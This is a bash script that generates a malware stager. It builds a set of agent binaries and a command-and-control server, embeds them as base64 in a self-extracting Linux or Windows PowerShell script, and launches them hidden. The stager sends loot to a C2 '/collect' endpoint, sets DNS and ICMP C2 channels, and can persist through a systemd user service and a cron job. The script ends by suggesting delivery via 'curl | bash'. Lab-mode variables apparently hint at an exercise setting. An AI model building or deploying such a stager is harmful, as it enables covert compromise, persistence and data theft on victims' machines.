#!/usr/bin/env bash
# Hive Colony Payload Generator
# Creates a single stager script embedding all agent binaries (base64).
# The stager self-extracts, deploys, and launches the entire colony.
set -euo pipefail

RED='\033[0;31m'; GREEN='\033[0;32m'; CYAN='\033[0;36m'; NC='\033[0m'
log()  { echo -e "${CYAN}[*]${NC} $*"; }
ok()   { echo -e "  ${GREEN}✓${NC} $*"; }
fail() { echo -e "  ${RED}✗${NC} $*"; exit 1; }

BUILD_MODE="release"
CARGO_TARGET="release"
OUTPUT="hive_payload.sh"
TARGET_OS="linux"
COMPRESS=true
C2_PORT=8444
C2_HOST=""
ARENA_NAME="hive_colony"

while [[ $# -gt 0 ]]; do case "$1" in
    --debug)        BUILD_MODE=""; CARGO_TARGET="debug"; shift ;;
    --output)       OUTPUT="$2"; shift 2 ;;
    --windows)      TARGET_OS="windows"; shift ;;
    --c2-host)      C2_HOST="$2"; shift 2 ;;
    --c2-port)      C2_PORT="$2"; shift 2 ;;
    --no-compress)  COMPRESS=false; shift ;;
    *) echo "Usage: $0 [--debug] [--windows] [--output FILE] [--c2-host HOST] [--c2-port PORT]"; exit 1 ;;
esac; done

BASE_DIR="$(cd "$(dirname "$0")/.." && pwd)"
BIN_DIR="${BASE_DIR}/target/${CARGO_TARGET}"
if [ "$TARGET_OS" = "windows" ]; then
    BIN_DIR="${BASE_DIR}/target/x86_64-pc-windows-gnu/${CARGO_TARGET}"
    EXT=".exe"
    INTERPRETER=""
else
    EXT=""
    INTERPRETER="#!/usr/bin/env bash"
fi

log "Hive Colony Payload Generator"
log "  Target:    ${TARGET_OS}"
log "  Build:     ${CARGO_TARGET}"
log "  Output:    ${OUTPUT}"
echo ""

# ── Build agents ──
log "Building agents..."
TARGET_FLAG=""
[ "$TARGET_OS" = "windows" ] && TARGET_FLAG="--target x86_64-pc-windows-gnu"
AGENTS=(queen worker drone honeybee weaver swarm c2-server)
for agent in "${AGENTS[@]}"; do
    BIN="${BIN_DIR}/${agent}${EXT}"
    if [ ! -f "$BIN" ]; then
        log "  Building ${agent}..."
        cargo build ${BUILD_MODE} ${TARGET_FLAG} -p "$agent" 2>&1 | tail -1
    else
        ok "${agent} binary found"
    fi
done

# ── Embed binaries as base64 ──
log "Embedding binaries..."
STAGER_DIR=$(mktemp -d)
trap "rm -rf ${STAGER_DIR}" EXIT

for agent in "${AGENTS[@]}"; do
    BIN="${BIN_DIR}/${agent}${EXT}"
    if [ ! -f "$BIN" ]; then
        fail "Missing ${BIN}"
    fi
    SIZE=$(stat -c%s "$BIN")
    log "  Encoding ${agent} (${SIZE} bytes)..."
    if [ "$COMPRESS" = true ] && command -v gzip &>/dev/null; then
        gzip -c "$BIN" | base64 -w0 > "${STAGER_DIR}/${agent}.b64.gz"
        echo "${agent}|${SIZE}|compressed" >> "${STAGER_DIR}/manifest.txt"
    else
        base64 -w0 "$BIN" > "${STAGER_DIR}/${agent}.b64"
        echo "${agent}|${SIZE}|raw" >> "${STAGER_DIR}/manifest.txt"
    fi
done

# ── Generate stager ──
log "Generating stager..."

if [ "$TARGET_OS" = "windows" ]; then
    # Windows: PowerShell stager
    cat > "$OUTPUT" << 'PSEOF'
# Hive Colony Stager (Windows)
# Generated by build_payload.sh
param(
    [string]$C2Host = "",
    [int]$C2Port = 8444
)

$ErrorActionPreference = "SilentlyContinue"
$tmp = "$env:TEMP\hive_colony"
mkdir $tmp -Force | Out-Null
$manifest = @()
PSEOF
    for agent in "${AGENTS[@]}"; do
        B64=$(cat "${STAGER_DIR}/${agent}.b64.gz" 2>/dev/null || cat "${STAGER_DIR}/${agent}.b64")
        echo "\$manifest += @('${agent}')" >> "$OUTPUT"
        cat >> "$OUTPUT" << EOF
\$b64 = @" 
${B64}
"@
[IO.File]::WriteAllBytes("${tmp}\\${agent}.exe.gz", [Convert]::FromBase64String(\$b64))
EOF
    done
    cat >> "$OUTPUT" << 'PSEOF2'
# Extract compressed binaries
Get-ChildItem "$tmp\*.exe.gz" | ForEach-Object {
    $dst = $_.FullName -replace '\.gz$',''
    $stream = New-Object IO.FileStream($dst, [IO.FileMode]::Create)
    $gz = New-Object IO.Compression.GZipStream(
        ([IO.File]::OpenRead($_.FullName)),
        [IO.Compression.CompressionMode]::Decompress
    )
    $gz.CopyTo($stream)
    $gz.Close(); $stream.Close()
    Remove-Item $_.FullName
}

# Set env
$env:__HIVE_ARENA = "hive_colony"
$env:HIVE_LAB_MODE = "1"
if ($C2Host) { $env:HIVE_C2_URL = "http://${C2Host}:${C2Port}/collect" }

# Start C2
Start-Process -WindowStyle Hidden "$tmp\c2-server.exe" -ArgumentList "--port $C2Port --loot-dir $tmp\loot --db-path $tmp\c2.db"

# Start agents
$agents = @('queen','worker','drone','honeybee','weaver','swarm')
foreach ($a in $agents) {
    $bin = "$tmp\$a.exe"
    if (Test-Path $bin) {
        Start-Process -WindowStyle Hidden $bin
        Start-Sleep -Milliseconds 300
    }
}
Write-Output "Hive Colony deployed: $tmp"
PSEOF2
else
    # Linux: Bash stager
    cat > "$OUTPUT" << 'BASHEOF'
#!/usr/bin/env bash
# Hive Colony Stager (Linux)
# Generated by build_payload.sh — self-extracting archive
set -euo pipefail

C2_HOST="${C2_HOST:-}"
C2_PORT="${C2_PORT:-8444}"
INSTALL_DIR="${INSTALL_DIR:-/tmp/.hive}"
ARENA_NAME="${ARENA_NAME:-hive_colony}"

cleanup() { rm -rf "$INSTALL_DIR"; }
[ "${HIVE_PERSIST:-0}" != "1" ] && trap cleanup EXIT

mkdir -p "$INSTALL_DIR"/loot
cd "$INSTALL_DIR"

# Embedded binaries (base64 compressed)
BASHEOF

    for agent in "${AGENTS[@]}"; do
        B64=$(cat "${STAGER_DIR}/${agent}.b64.gz" 2>/dev/null || cat "${STAGER_DIR}/${agent}.b64")
        cat >> "$OUTPUT" << EOF
decode_${agent}() { base64 -d << 'B64EOF'
${B64}
B64EOF
}

EOF
    done

    # Extraction + execution
    cat >> "$OUTPUT" << 'BASHEOF2'
# Extract binaries
for agent in queen worker drone honeybee weaver swarm c2-server; do
    "decode_${agent}" | (command -v gzip &>/dev/null && gzip -d || cat) > "${INSTALL_DIR}/${agent}"
    chmod +x "${INSTALL_DIR}/${agent}"
done

# Export environment
export __HIVE_ARENA="${ARENA_NAME}"
export HIVE_LAB_MODE=1
export RUST_LOG="info"
[ -n "$C2_HOST" ] && export HIVE_C2_URL="http://${C2_HOST}:${C2_PORT}/collect"
export HIVE_C2_DNS_DOMAIN="hive.internal"
export HIVE_C2_ICMP_TARGET="8.8.8.8"

# Start C2 server
"${INSTALL_DIR}/c2-server" --port "$C2_PORT" \
    --loot-dir "${INSTALL_DIR}/loot" \
    --db-path "${INSTALL_DIR}/c2.db" > /dev/null 2>&1 &
C2_PID=$!

# Wait for C2
for i in $(seq 1 15); do
    if curl -sf "http://127.0.0.1:${C2_PORT}/health" > /dev/null 2>&1; then
        break
    fi
    sleep 1
done

# Launch Queen (she'll orchestrate the rest)
"${INSTALL_DIR}/queen" > /dev/null 2>&1 &
QUEEN_PID=$!
sleep 3

# Launch remaining agents
for agent in worker drone honeybee weaver swarm; do
    "${INSTALL_DIR}/${agent}" > /dev/null 2>&1 &
    sleep 0.5
done

# Persistence (optional: HIVE_PERSIST=1)
if [ "${HIVE_PERSIST:-0}" = "1" ]; then
    mkdir -p ~/.config/systemd/user/
    cat > ~/.config/systemd/user/hive-colony.service << SERVICE
[Unit]
Description=Hive Colony
[Service]
ExecStart=${INSTALL_DIR}/queen
Restart=always
Environment=__HIVE_ARENA=${ARENA_NAME}
Environment=HIVE_LAB_MODE=1
[Install]
WantedBy=default.target
SERVICE
    systemctl --user enable hive-colony.service 2>/dev/null || true
    systemctl --user start hive-colony.service 2>/dev/null || true

    # Cron fallback
    (crontab -l 2>/dev/null; echo "*/5 * * * * ${INSTALL_DIR}/queen >/dev/null 2>&1") | crontab - 2>/dev/null || true
fi

echo "Hive Colony deployed (PID ${QUEEN_PID})"
echo "  C2:  http://127.0.0.1:${C2_PORT}"
echo "  Dir: ${INSTALL_DIR}"

# Keep alive
wait $QUEEN_PID 2>/dev/null
BASHEOF2
fi

chmod +x "$OUTPUT"
TOTAL_SIZE=$(du -h "$OUTPUT" | cut -f1)
ok "Payload generated: ${OUTPUT} (${TOTAL_SIZE})"
log "Deploy with: bash ${OUTPUT}"
log "Deploy with persistence: HIVE_PERSIST=1 bash ${OUTPUT}"
log "Or: curl -s http://your-server/hive_payload.sh | bash"
